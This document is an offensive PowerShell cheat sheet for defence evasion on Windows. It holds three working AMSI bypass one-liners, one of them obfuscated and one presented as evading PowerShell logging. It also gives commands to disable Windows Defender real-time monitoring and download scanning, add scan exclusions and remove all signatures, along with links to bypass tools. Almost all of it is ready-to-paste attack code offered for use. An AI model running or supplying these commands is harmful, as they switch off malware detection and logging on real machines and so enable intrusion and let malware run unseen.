For more on AMSI bypass - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
To generate obfuscated AMSI bypass - https://amsi.fail/
AMSI
Obfuscated AMSI Bypass (Obfuscation is more effective)
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Plain AMSI Bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Bypass not detected by PowerShell logging
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
WINDOWS DEFENDER
Below commands need LOCAL ADMINISTRATOR PRIVILEGE
Disable Windows Defender's Real Time Monitoring (Needs Local Admin Privilege)
Set-MpPreference -DisableRealTimeMonitoring $true
Disable Windows Defender Malicious Content Scanner for downloaded files (Needs Local Admin Privilege)
Set-MpPreference -DisableIOAVProtection $true
List all excluded paths from Windows Defender
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
Add exclusion path for Windows Defender
Add-MpPreference -ExclusionPath "<EXCLUSION PATH>"
Instead of disabling Windows Defender, you can leave it enabled and just remove all virus signatures from it.
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -Al